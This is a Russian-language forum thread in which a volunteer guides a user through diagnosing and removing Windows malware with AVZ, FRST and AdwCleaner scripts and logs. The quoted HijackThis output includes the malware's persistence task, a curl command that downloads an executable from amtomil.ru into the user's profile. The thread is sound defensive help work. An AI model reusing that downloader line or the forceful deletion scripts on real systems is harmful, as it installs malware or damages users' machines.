Решена Вирус MSI: диагностика и удаление

Статус
В этой теме нельзя размещать новые ответы.
T

Tykoro

Новый пользователь
Сообщения
11
Реакции
0
Вирус MSI
 

Вложения

  • CollectionLog-2017.08.23-05.25.zip
    89.3 KB · Просмотры: 4
UC Browser - сами устанавливали? Если нет, то удалите. Файл host сами правили?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код: 
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 SetServiceStart('SvcHost Service Host', 4);
 SetServiceStart('Ea3Host', 4);
 QuarantineFile('C:\WINDOWS\microsoft\svchost.exe','');
 QuarantineFile('C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe','');
 QuarantineFile('C:\Windows\Microsoft\svchost.exe','');
 QuarantineFile('C:\WINDOWS\system32\Ea3Host.exe','');
 QuarantineFile('C:\Windows\Microsoft\svchost.exe.exe','');
 QuarantineFile('c:\windows\microsoft\svchost.exe','');
 QuarantineFile('C:\Windows\System32\Ea3Host.exe','');
 QuarantineFile('C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe','');
 DeleteFile('C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\Windows\System32\Ea3Host.exe','32');
 DeleteFile('c:\windows\microsoft\svchost.exe','32');
 DeleteFile('C:\Windows\Microsoft\svchost.exe.exe','32');
 DeleteFile('C:\WINDOWS\system32\Ea3Host.exe','32');
 DeleteFile('C:\Windows\Microsoft\svchost.exe','32');
 DeleteFile('C:\WINDOWS\system32\Tasks\curl','64');
 DeleteFile('C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\Users\Allure\AppData\Roaming\curl\curl.exe','32');
 DeleteFile('C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe','32');
 DeleteFile('C:\WINDOWS\system32\Tasks\MSI','64');
 DeleteFile('C:\Users\Allure\appdata\roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\WINDOWS\microsoft\svchost.exe.exe','32');
 DeleteFile('C:\WINDOWS\microsoft\svchost.exe','32');
 DeleteService('SvcHost Service Host');
 DeleteService('Ea3Host');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','njvwfmoxsd');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

Код: 
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.


Полученный архив отправьте при помощи этой формы

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код: 
O4 - HKCU\..\Run: [njvwfmoxsd] C:\WINDOWS\explorer.exe "http://pazdykha.ru/?utm_source=uoua03&utm_content=f53c99a1a9f221180d1cc800a867ecdb&utm_term=D3997B5B325AAF53E6214492C1CDA4E2&utm_d=20170816"
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): curl - C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Allure\AppData\Roaming\curl\curl.exe
O22 - Task (Ready): curls - C:\Users\Allure\AppData\Roaming\curl\curl.exe (file missing)
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
Да, uc браузер я сам устанавливал, и яндекс браузе тоже.
hosts для програмки auslogic или как то так, и всё
А какой скрипт, можно узнать?
А, всё, понял
Вот
Вроде всё сделал, отправил. Теперь жду :)
 

Вложения

  • Addition.txt
    79.3 KB · Просмотры: 1
  • FRST.txt
    44 KB · Просмотры: 4
  • Shortcut.txt
    44.7 KB · Просмотры: 0
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код: 
    Start::
CreateRestorePoint:
() C:\Windows\System32\Ea3Host.exe
() C:\Windows\Microsoft\svchost.exe
() C:\Windows\Microsoft\svchost.exe.exe
C:\Windows\Microsoft\svchost.exe.exe
C:\Windows\Microsoft\svchost.exe
C:\Users\Allure\AppData\Roaming\curl\curl.exe
C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe
HKU\S-1-5-21-3348904501-4052270771-1728816051-1001\...\Run: [njvwfmoxsd] => explorer "hxxp://pazdykha.ru/?utm_source=uoua03&utm_content=f53c99a1a9f221180d1cc800a867ecdb&utm_term=D3997B5B325AAF53E6214492C1CDA4E2&utm_d=20170816" <==== ATTENTION
R2 Ea3Host; C:\WINDOWS\system32\Ea3Host.exe [969024 2017-08-16] ()
R2 SvcHost Service Host; C:\Windows\Microsoft\svchost.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
2017-08-16 15:42 - 2017-08-12 05:23 - 000038080 _____ C:\WINDOWS\SysWOW64\sh4native.exe
2017-08-16 07:49 - 2017-08-23 04:58 - 000000000 ____D C:\Users\Allure\AppData\Roaming\curl
2017-08-16 07:49 - 2017-08-16 07:49 - 000003792 _____ C:\WINDOWS\System32\Tasks\curl
2017-08-16 07:49 - 2017-08-16 07:49 - 000003592 _____ C:\WINDOWS\System32\Tasks\curls
2017-08-16 07:48 - 2017-08-16 07:48 - 000969024 _____ C:\WINDOWS\system32\Ea3Host.exe
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
Task: {5F6240F6-7BE2-46F9-BBC5-CAFB6D5CDC7E} - System32\Tasks\curls => C:\Users\Allure\AppData\Roaming\curl\curl.exe <==== ATTENTION
Task: {7577B0A9-1614-475C-A6E8-F964EF89D468} - System32\Tasks\curl => C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe [2017-08-16] (curl, hxxps://curl.haxx.se/) <==== ATTENTION
Task: {A8986176-62E2-4701-9406-884B4AF2CD1E} - System32\Tasks\MSI => C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION
 -  - 000000000 __RSH () C:\Windows\Microsoft\svchost.exe
 -  - 000000000 _____ () C:\Windows\Microsoft\svchost.exe.exe
2017-08-16 07:48 - 2017-08-16 07:48 - 000969024 _____ () C:\WINDOWS\system32\Ea3Host.exe
2017-08-16 07:50 - 2017-08-16 07:50 - 003514360 _____ () C:\Users\Allure\AppData\Local\Temp\bdzupW0mcoSX.exe
2017-08-16 07:05 - 2017-08-16 07:05 - 000192000 _____ () C:\Users\Allure\AppData\Local\Temp\bXEOVI5DSQ3u.exe
2017-08-16 07:42 - 2017-08-16 07:42 - 003514360 _____ () C:\Users\Allure\AppData\Local\Temp\ksJTlGJjWKpS.exe
2017-08-16 07:05 - 2017-08-16 07:05 - 000191999 _____ () C:\Users\Allure\AppData\Local\Temp\oPIXmk1O228d.exe
2017-08-16 07:03 - 2017-08-16 07:03 - 003514360 _____ () C:\Users\Allure\AppData\Local\Temp\pHzIimDfsy1s.exe
2017-08-16 07:00 - 2017-08-16 07:00 - 000774008 _____ (                                                            ) C:\Users\Allure\AppData\Local\Temp\ZaxarSetup.4.001.1991.exe
EmptyTemp:
Reboot:
End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 
Всё.
 

Вложения

  • Fixlog.txt
    6.4 KB · Просмотры: 3
Давайте новый комплект логов FRST для контроля
 
Воот
 

Вложения

  • FRST.txt
    44 KB · Просмотры: 2
Это старый лог. Запустите FRST еще раз и нажмите Scan.
И остальные два лога нужны
 
А какие еще остальные два лога?
Это вот отправил, что то еще нужно?
 

Вложения

  • Addition.txt
    75.7 KB · Просмотры: 0
  • Fixlog.txt
    6.4 KB · Просмотры: 0
  • Shortcut.txt
    44.7 KB · Просмотры: 0
Addition.txt и FRST.txt - эти нужны. Shortcut не нужен
 
Вот FRST
 

Вложения

  • FRST.txt
    41 KB · Просмотры: 4
Addition.txt - еще нужен
 
Вот Addition
 

Вложения

  • Addition.txt
    75.7 KB · Просмотры: 2
Какие из проблем еще остались?
 
В автозагрузке Yc пытался удалить, раньше название Chromium было, с значком синего браузера Google Chrome, щас иконки тоже нету
 
Походу это тоже зловред, сейчас дочистим.
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код: 
    Start::
CreateRestorePoint:
VirusTotal: C:\Users\Allure\AppData\Local\yc\Application\yc.exe
HKU\S-1-5-21-3348904501-4052270771-1728816051-1001\...\Run: [ycAutoLaunch_95A4966DF758B4F52078AF3870D252D8] => "C:\Users\Allure\AppData\Local\yc\Application\yc.exe" /prefetch:5
C:\Users\Allure\AppData\Local\yc\Application\yc.exe
EmptyTemp:
Reboot:
End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.



  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S1].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 
Вот, Fixlog. Щас будут логи от adw cleaner'a
Вот AdwCleaner[S1]
 

Вложения

  • Fixlog.txt
    1.7 KB · Просмотры: 1
  • AdwCleaner[S1].txt
    3.1 KB · Просмотры: 2
  • Запустите повторно AdwCleaner (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать").
  • По окончанию сканирования снимите галочки со следующих строк:
    Код: 
    PUP.Optional.SpyHunter, [Key] - HKLM\SOFTWARE\EnigmaSoftwareGroup
  • Нажмите кнопку "Clean" ("Очистка") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.
А теперь о остаточных симтомах, что-то осталось или переходим к финальным рекомендациям?
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу